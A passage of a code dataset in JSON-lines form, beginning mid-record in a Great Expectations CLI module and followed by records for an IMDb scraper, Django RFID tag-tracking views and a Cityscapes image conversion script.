cli_message(\"{}\".format(err.message))\n return\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n return\n\n if batch_kwargs is not None:\n batch_kwargs = json.loads(batch_kwargs)\n\n if datasource_name is None:\n datasources = [datasource[\"name\"] for datasource in context.list_datasources()]\n if not datasources:\n cli_message(NO_DATASOURCES_FOUND)\n sys.exit(-1)\n elif len(datasources) > 1:\n cli_message(\n \"Error: please specify the datasource to profile. \"\\\n \"Available datasources: \" + \", \".join(datasources) + \"\"\n )\n sys.exit(-1)\n else:\n profile_datasource(\n context,\n datasources[0],\n data_assets=data_assets,\n profile_all_data_assets=profile_all_data_assets,\n open_docs=view,\n additional_batch_kwargs=batch_kwargs\n )\n else:\n profile_datasource(\n context,\n datasource_name,\n data_assets=data_assets,\n profile_all_data_assets=profile_all_data_assets,\n open_docs=view,\n additional_batch_kwargs=batch_kwargs\n )\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=None,\n help=\"The project's great_expectations directory.\"\n)\n@click.option('--site_name', '-s',\n help='The site for which to generate documentation. See data_docs section in great_expectations.yml')\n@click.option(\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef build_docs(directory, site_name, view=True):\n \"\"\"Build Data Docs for a project.\"\"\"\n logger.debug(\"Starting cli.build_docs\")\n\n try:\n context = DataContext(directory)\n build_documentation_impl(\n context,\n site_name=site_name\n )\n if view:\n context.open_data_docs()\n except ge_exceptions.ConfigNotFoundError as err:\n cli_message(\"{}\".format(err.message))\n sys.exit(1)\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n return\n except ge_exceptions.PluginModuleNotFoundError as err:\n cli_message(err.cli_colored_message)\n sys.exit(1)\n except ge_exceptions.PluginClassNotFoundError as err:\n cli_message(err.cli_colored_message)\n sys.exit(1)\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=\"./great_expectations\",\n help=\"The project's great_expectations directory.\"\n)\ndef check_config(directory):\n \"\"\"Check a config for validity and help with migrations.\"\"\"\n cli_message(\"Checking your config files for validity...\\n\")\n\n try:\n is_config_ok, error_message = do_config_check(directory)\n if is_config_ok:\n cli_message(\"Your config file appears valid!\")\n else:\n cli_message(\"Unfortunately, your config appears to be invalid:\\n\")\n cli_message(\"{}\".format(error_message))\n sys.exit(1)\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, directory)\n\n\ndef _offer_to_install_new_template(err, ge_dir):\n ge_dir = os.path.abspath(ge_dir)\n cli_message(\"{}\".format(err.message))\n ge_yml = os.path.join(ge_dir, DataContext.GE_YML)\n archived_yml = ge_yml + \".archive\"\n\n if click.confirm(\n NEW_TEMPLATE_PROMPT.format(ge_yml, archived_yml),\n default=True\n ):\n # archive existing project config\n shutil.move(ge_yml, archived_yml)\n DataContext.write_project_template_to_disk(ge_dir)\n\n cli_message(NEW_TEMPLATE_INSTALLED.format(\"file://\" + ge_yml, \"file://\" + archived_yml))\n else:\n cli_message(\n \"\"\"\\nOK. To continue, you will need to upgrade your config file to the latest format.\n - Please see the docs here: https://docs.greatexpectations.io/en/latest/reference/data_context_reference.html\n - We are super sorry about this breaking change! :]\n - If you are running into any problems, please reach out on Slack and we can\n help you in realtime: https://greatexpectations.io/slack\"\"\"\n )\n sys.exit(0)\n\n\ndef do_config_check(target_directory):\n try:\n DataContext(context_root_dir=target_directory)\n return True, None\n except (\n ge_exceptions.InvalidConfigurationYamlError,\n ge_exceptions.InvalidTopLevelConfigKeyError,\n ge_exceptions.MissingTopLevelConfigKeyError,\n ge_exceptions.InvalidConfigValueTypeError,\n ge_exceptions.InvalidConfigVersionError,\n ge_exceptions.UnsupportedConfigVersionError,\n ge_exceptions.DataContextError,\n ge_exceptions.PluginClassNotFoundError\n ) as err:\n return False, err.message\n\n\ndef main():\n handler = logging.StreamHandler()\n # Just levelname and message Could re-add other info if we want\n formatter = logging.Formatter(\n '%(message)s')\n # '%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)\n cli()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"great_expectations/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":20058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"240163197","text":"from lxml import html\nimport requests\n\n# Global debug variable, turns on several printed tests\ndebug = False\n\n\ndef search(title):\n # Run search, save results into local variable\n if debug:\n print(\"search CALLED\") # Debug statement\n search_string = get_search_results(title)\n\n # Pass resulting search URL into get_html_tree\n movie_tree = get_html_tree(search_string)\n if debug:\n print(\"search RETURNING\")\n return movie_tree\n\n\ndef get_search_results(title):\n search_text = title\n # Format search URL and grab the search results page\n search_page = requests.get('http://www.imdb.com/find?q=' + str(search_text).strip() + '&s=tt')\n # Create an HTML tree using html.fromstring\n search_tree = html.fromstring(search_page.content)\n # Grab the URL of the first movie page in the search results\n search_result = search_tree.xpath('//td[@class=\"result_text\"][1]/a/@href')\n # Return the string that contains the URL, or error handler if it wasn't found\n if search_result:\n return search_result[0].strip()\n else:\n print(\"No movies with this title found.\")\n return False\n # print \"Search result URL: \", search_result[0] #Debug statement\n\n\ndef get_html_tree(movie_link):\n # Determine if passed value is False (which means null value in previous function)\n if movie_link is False:\n return False\n # Passes movie_link parameter to requests.get\n movie_page = requests.get('http://www.imdb.com' + str(movie_link))\n # Generate an HTML tree of movie page\n movie_tree = html.fromstring(movie_page.content)\n return movie_tree\n\n\ndef get_summary(movie_tree, movie):\n # Grab the summary (returns as string)\n xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"summary_text\"]/text()|'\n '//*[@id=\"title-overview-widget\"]//div[@class=\"summary_text\"]/a/text()')\n # xpath is converted to string via .join()\n summary = ''.join(xpath).strip()\n # Return the string summary or error handler if no summary found\n if summary:\n movie.summary = summary\n else:\n movie.summary = \"Summary unavailable for this title.\"\n return False\n\n\ndef get_misc(movie_tree, movie):\n if debug:\n print(\"show_misc CALLED\")\n rating_xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"subtext\"]/meta/@content')\n if rating_xpath:\n movie.rating = ''.join(rating_xpath)\n if debug:\n print(\"Movie rating:\", movie.rating) # Debug statement\n\n runtime_xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"subtext\"]//'\n '*[@itemprop=\"duration\"]/text()')\n if runtime_xpath:\n movie.runtime = ''.join([text.replace('\\n', '').strip() for text in runtime_xpath])\n # Credit: Falcon Taylor-Carter\n if debug:\n print(\"Movie runtime:\", movie.runtime) # Debug statement\n\n genre_xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"subtext\"]//a/'\n '*[@itemprop=\"genre\"]/text()')\n if genre_xpath:\n genre_xpath = ''.join([''.join((item + ', ') for item in genre_xpath[0:-1]), genre_xpath[-1]])\n movie.genre = genre_xpath\n if debug:\n print(\"Movie genre:\", genre_xpath) # Debug statement\n if debug:\n print(\"show_misc FINISHED\")\n\n\ndef get_reviews(movie_tree, movie):\n # Grab the review (returns as string))\n xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"imdbRating\"]//strong/@title')\n review = ''.join(xpath).strip()\n if review:\n movie.review = review\n else:\n movie.review = \"Title has no reviews.\"\n\n\nclass Movie:\n \"\"\"Base class for all movies\"\"\"\n def __init__(self, title, summary=\"Summary unavailable\", rating=\"Rating unknown\", runtime=\"Runtime unknown\",\n genre=\"Genre unknown\", review=\"No user reviews.\"): # Change default argument to \"unknown\"\n self.title = title\n self.summary = summary\n # Next three lines effectively \"self.misc\"\n self.rating = rating\n self.runtime = runtime\n self.genre = genre\n self.review = review\n self.alpha_title = self.title.lower()\n self.update()\n self.gen_alpha_title()\n\n def __str__(self):\n return ''.join(string for string in [self.title, '\\n', self.summary, '\\n', self.rating,\n ' | ', self.runtime, ' | ', self.genre, '\\n', self.review])\n\n def __repr__(self):\n return 'Movie(' + ''.join([''.join(string for string in ['\\\"', self.title, '\\\", \\\"', self.summary, '\\\", \\\"',\n self.rating, '\\\", \\\"', self.runtime, '\\\", \\\"',\n self.genre, '\\\", \\\"', self.review, '\\\")'])])\n\n def update(self):\n # Can be called using Movie.update() in order to refresh information, which may have changed on IMDB\n movie_tree = search(self.title)\n get_summary(movie_tree, self)\n get_misc(movie_tree, self)\n get_reviews(movie_tree, self)\n\n def gen_alpha_title(self):\n if \"The \" in self.title[0:4]:\n self.alpha_title = self.title.replace(\"The \", '', 1)\n self.alpha_title += \", The\"\n self.alpha_title = self.alpha_title.lower()\n else:\n self.alpha_title = self.title.lower()\n","sub_path":"imdb_search.py","file_name":"imdb_search.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"567138065","text":"from django.shortcuts import render\nfrom django.http import JsonResponse, HttpResponseNotAllowed, Http404, HttpResponse\nfrom django.utils.dateparse import parse_datetime\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom .models import TagTracker\nimport datetime\nimport json\n\n@csrf_exempt\ndef update_tag_location(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n except (ValueError, TypeError) as e:\n msg = 'unable to parse request body as json'\n result = {'error': {'error_code': 500, 'error_message': msg}}\n return JsonResponse(result, status=500)\n try:\n token = data['token']\n valid_token = token and token[:6] == 'Token ' and token[6:] in settings.VALID_TOKENS\n except KeyError:\n valid_token = False\n if not valid_token:\n return JsonResponse({'error': {'error_code': 401, 'error_message': 'Unauthorized'}}, status=401)\n try:\n tag_id = data['tag_id']\n antenna = data['antenna']\n reader = data['reader']\n found_time = data['found_time']\n found_time = parse_datetime(found_time)\n if not found_time:\n msg = 'unable to parse found_time as timezone aware datetime object'\n result = {'error': {'error_code': 500, 'error_message': msg}}\n return JsonResponse(result, status=500)\n TagTracker.objects.update_tag_location(tag_id, antenna, reader, found_time)\n result = {'ok': True}\n return JsonResponse(result, status=200)\n except KeyError:\n msg = 'Unable to parse tag_id, antenna, reader, or found_time from request body'\n result = {'error': {'error_code': 500, 'error_message': msg}}\n return JsonResponse(result, status=500)\n return HttpResponseNotAllowed(['POST'])\n\ndef store_stock(request):\n if request.method == 'GET':\n tags = TagTracker.objects.store_stock()\n return render(request, 'tag_metrics/store_stock.html', context={'tags': tags})\n return HttpResponseNotAllowed(['GET'])\n\ndef tag_location(request):\n if request.method == 'GET':\n tags = TagTracker.objects.last_locations()\n return render(request, 'tag_metrics/tag_location.html', context={'tags': tags})\n return HttpResponseNotAllowed(['GET'])\n\ndef tag_flow_today(request):\n if request.method == 'GET':\n today = datetime.datetime.now()\n start_date = datetime.datetime.combine(today, datetime.time.min)\n end_date = datetime.datetime.combine(today, datetime.time.max)\n start_date = start_date.strftime('%Y-%m-%d %H:%M:%S')\n end_date = end_date.strftime('%Y-%m-%d %H:%M:%S')\n # print(start_date, end_date)\n tags = TagTracker.objects.tag_flow(start_date, end_date)\n return render(request,\n 'tag_metrics/tag_flow.html',\n context={'tags': tags,\n 'start_date': start_date,\n 'end_date': end_date\n }\n )\n return HttpResponseNotAllowed(['GET'])\n\ndef tag_flow_week(request):\n if request.method == 'GET':\n today = datetime.datetime.now()\n start_date = datetime.datetime.combine(today, datetime.time.min)\n start_date = start_date - datetime.timedelta(days=start_date.weekday())\n end_date = start_date + datetime.timedelta(days=6)\n end_date = datetime.datetime.combine(end_date, datetime.time.max)\n start_date = start_date.strftime('%Y-%m-%d %H:%M:%S')\n end_date = end_date.strftime('%Y-%m-%d %H:%M:%S')\n # print(start_date, end_date)\n tags = TagTracker.objects.tag_flow(start_date, end_date)\n return render(request,\n 'tag_metrics/tag_flow.html',\n context={'tags': tags,\n 'start_date': start_date,\n 'end_date': end_date\n }\n )\n return HttpResponseNotAllowed(['GET'])\n","sub_path":"tag_metrics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"124955953","text":"import cv2 as cv\nimport os\nfrom utils import image_id\n\nrootdir = '/home/cessful/data_set/leftImg8bit_trainvaltest/leftImg8bit/'\nsavedir = '/home/cessful/data_set/city2pascal/JPEGImages/'\n\nfor _set in ['test']:\n print(_set)\n rootdir += _set\n img_Lists = image_id(rootdir)\n for item in img_Lists:\n full_name = rootdir + '/' + item + '_leftImg8bit' +'.png'\n print(full_name)\n img = cv.imread(full_name)\n index = item.rfind('/')\n list_temp = list(item)\n list_temp[index] = '_'\n out_path = ''.join(list_temp)\n out_path = out_path[:-24]\n if not os.path.exists(savedir):\n os.mkdir(savedir)\n cv.imwrite((savedir + out_path + '.jpg'), img)\n print(_set)\n\n","sub_path":"extract_img.py","file_name":"extract_img.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}